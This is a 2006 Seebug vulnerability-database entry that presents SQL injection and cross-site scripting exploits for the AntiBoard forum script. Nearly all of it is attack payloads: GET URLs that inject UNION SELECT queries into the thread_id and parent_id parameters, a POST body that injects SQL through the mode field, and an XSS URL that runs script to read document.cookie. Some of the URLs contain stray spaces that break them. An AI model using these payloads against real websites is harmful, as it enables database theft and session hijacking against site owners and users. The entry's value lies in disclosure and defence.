AntiBoardSQL注入及跨站脚本攻击漏洞 Exploit

2006-12-08T00:00:00
ID SSV:5776
Type seebug
Reporter Root
Modified 2006-12-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Josh Gilmour (gilmourj@gmail.com)提供了如下测试方法:

/antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=thr eaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20w hatever--&sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=1

A remote user can also submit an HTTP POST request with the following parameters to inject SQL commands:

poster_name=1111&poster_email=1111&message_title=1111&message_bo dy=1111&submit=Submit%2bmessage&thread_id=3&mode=
ALL select field from antiboard_emails----&reply=reply

http://[target]/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(docu ment.cookie);</script>